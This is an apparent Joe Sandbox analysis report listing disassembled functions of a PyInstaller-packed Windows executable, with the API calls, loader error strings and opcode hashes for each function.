• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D2A
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4478: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B448C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D3B
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4418: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B442C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D4C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4448: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B445C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: RtlFreeHeap.NTDLL(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6029B4F8C), ref: 00007FF6029B4D73
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                            • API String ID: 3458911817-239921721
                                                                                                                                                                                                                            • Opcode ID: 0f3283847f15c13fbe07a233ec23dc9a028512d3283ed39990bc2be6d200f3c9
                                                                                                                                                                                                                            • Instruction ID: 1a3fba4cc495798e34acbb1d96239d576753923b1c089756c9e9a044fd92d29a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f3283847f15c13fbe07a233ec23dc9a028512d3283ed39990bc2be6d200f3c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD51A132A1864286E711DF27EA911B97B60FF8878CF606135EA4DC7697DFBCE4019740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                            • Opcode ID: 0b2b2b821024264583e45c17847e4aeb3761903e45f482e3a199f61f7deda80f
                                                                                                                                                                                                                            • Instruction ID: 0eec0533ce7a8f831826c8006c1060744d8332ddbf30b9b71040a25de4d18897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b2b2b821024264583e45c17847e4aeb3761903e45f482e3a199f61f7deda80f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BF0C862A1C7418BF7A08B69B48A76A7790FF8473CF140339DA6D426D5DF7CD059CA00
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1010374628-0
                                                                                                                                                                                                                            • Opcode ID: 9ac1dc9cddc2bc399561159482218908d43417da58d47a969a1af359aeee91bd
                                                                                                                                                                                                                            • Instruction ID: 7f687aa2411a0a56027b21c678b4a1d7e8230964fa7c047a6785ac1998f145c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ac1dc9cddc2bc399561159482218908d43417da58d47a969a1af359aeee91bd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE02AF21E0DB4381FB55AB2394002B96E90AF41B98F744639DD5ECBBD3DEFEA4019390

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 677216364-3497178890
                                                                                                                                                                                                                            • Opcode ID: 836b47718657b2a1b3339cc25782f59462ea8991cdf4b098d3c399e0302976f1
                                                                                                                                                                                                                            • Instruction ID: 3bc60567fb18ec63b79c1fed2e8987e1e06e0d8f5f617e6a06a0d30bec826ce8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 836b47718657b2a1b3339cc25782f59462ea8991cdf4b098d3c399e0302976f1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0071E531E0868399EB20CB1ED5503B96B92FF4979CF644035E98DC7B8BEEACE5558700

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                            • Opcode ID: 7357adf9999cca54884c8793987b2a834a18990e7889689fe3dae01b567150d2
                                                                                                                                                                                                                            • Instruction ID: 6407cc18d1fd11d8f2945dbc832357982262034f8f189bcc131f36ec77d768ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7357adf9999cca54884c8793987b2a834a18990e7889689fe3dae01b567150d2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3151F061F086439AEA109B1BE9001B96B60FF44BACF644031EE0CC7B97EFBDE1658340

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                            • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                            • API String ID: 2895956056-699529898
                                                                                                                                                                                                                            • Opcode ID: bad98a2e6fff8929db7f8baee1eb0b6edf4e9f8e86b040b8313d0eea73b8bd2b
                                                                                                                                                                                                                            • Instruction ID: 90ba3ad141af14384b1a085431f9e99838602150f9cc0e0227781e7c16ddf57f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad98a2e6fff8929db7f8baee1eb0b6edf4e9f8e86b040b8313d0eea73b8bd2b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A413131A0878285EB209B65F4452AEB7A0FF89378F600335E6AD877D6DFBCD0548B40

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                            • Opcode ID: ce8762095e2481ef98b6baba2e7ff42592d2236a169c4c8f9ec5af115cda9da3
                                                                                                                                                                                                                            • Instruction ID: d611e12a62c6377948f8f3a41cbef4203d4d55f44b3c84ce1bee7197b8eff2f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce8762095e2481ef98b6baba2e7ff42592d2236a169c4c8f9ec5af115cda9da3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6451E422A0864389EB209B1BA5503BA6A91FF857A8F644135ED4DC7BD7EFBCE451C700

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6029ADF2A,?,?,-00000018,00007FF6029A9BD3,?,?,?,00007FF6029A9ACA,?,?,?,00007FF6029A4F9E), ref: 00007FF6029ADD0C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6029ADF2A,?,?,-00000018,00007FF6029A9BD3,?,?,?,00007FF6029A9ACA,?,?,?,00007FF6029A4F9E), ref: 00007FF6029ADD18
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                            • Opcode ID: f65bba0801ac06b96f2f3a4d918bbe6eed0efd0f6f5c7edcd61ac98fb66de638
                                                                                                                                                                                                                            • Instruction ID: 37b8f41db3b582c36bb714a0148e73a103e7023c6195ff2381ec3a7a31354a43
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f65bba0801ac06b96f2f3a4d918bbe6eed0efd0f6f5c7edcd61ac98fb66de638
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E341E521F19B0241FB16CB1798005752BA1BF49BA8FA85135DD0DC7B86EFFDE8458390

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF602993834), ref: 00007FF602997C34
                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF602993834), ref: 00007FF602997C7C
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997D60: GetEnvironmentVariableW.KERNEL32(00007FF60299365F), ref: 00007FF602997D97
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997D60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF602997DB9
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A70B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029A70C9
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029926C0: MessageBoxW.USER32 ref: 00007FF602992736
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                            • API String ID: 740614611-1339014028
                                                                                                                                                                                                                            • Opcode ID: 1c5b6979b1331aa4fa2327e85b2148ecf31c35182d526a30fca54ffd08636c69
                                                                                                                                                                                                                            • Instruction ID: 2564563cf5da7d49b9a4b7835d0df9a80b270be2010a6f9454b4957c05495515
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c5b6979b1331aa4fa2327e85b2148ecf31c35182d526a30fca54ffd08636c69
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2941A051E2964349FA20EB6B95552F95A51EF89BACF704032EE0EC77D7EEBCE5008240

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 31d13e49edb6b77dcfdb248b250af955fe9e2782487ea0c538027bd5ccf0f89f
                                                                                                                                                                                                                            • Instruction ID: f51ee67aa6c762cfbae7636ece9a8f3a904258eae2979416ddc5c1b84ab09d76
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d13e49edb6b77dcfdb248b250af955fe9e2782487ea0c538027bd5ccf0f89f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7C1BC22E0878692EB619B1694402BD3FB1EF91B98F754135DA4E87793CEFCE845C380

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                            • Opcode ID: 68ffd57f6f0a9ecb9272feaa9a5a48b7ffc45862fed44bbf183e598809a34341
                                                                                                                                                                                                                            • Instruction ID: df881386eab03e55c47a3404cb7ae34dc1359f645cadbac16a19c65dddf9a896
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68ffd57f6f0a9ecb9272feaa9a5a48b7ffc45862fed44bbf183e598809a34341
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2216531A1C64646EB508B5AE58027AFBA1FF85BB8F200235D65D83BD6DFBCD4548704

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF602993534), ref: 00007FF602993411
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: GetLastError.KERNEL32(?,?,?,00007FF60299342E,?,00007FF602993534), ref: 00007FF602992A14
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: FormatMessageW.KERNEL32(?,?,?,00007FF60299342E), ref: 00007FF602992A7D
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: MessageBoxW.USER32 ref: 00007FF602992ACF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                            • API String ID: 517058245-2863816727
                                                                                                                                                                                                                            • Opcode ID: 1891cfa551e3e280dc1046c601286eed7625d1f5967d42fe977e657d1173ede6
                                                                                                                                                                                                                            • Instruction ID: 0f5ce0ec48920a8e929dbf8d3c85f2ba0b632e84da81b70d54949d1742280080
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1891cfa551e3e280dc1046c601286eed7625d1f5967d42fe977e657d1173ede6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321B210F1854258FA21DB2AE8113BA1B50FF493ACFA00136DA5DC25D7EEACE514C304

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetCurrentProcess.KERNEL32 ref: 00007FF602997AC0
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: OpenProcessToken.ADVAPI32 ref: 00007FF602997AD3
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetTokenInformation.KERNELBASE ref: 00007FF602997AF8
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetLastError.KERNEL32 ref: 00007FF602997B02
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetTokenInformation.KERNELBASE ref: 00007FF602997B42
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF602997B5E
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: CloseHandle.KERNEL32 ref: 00007FF602997B76
                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF602993814), ref: 00007FF6029981EC
                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF602993814), ref: 00007FF6029981F5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                            • API String ID: 6828938-1529539262
                                                                                                                                                                                                                            APIs
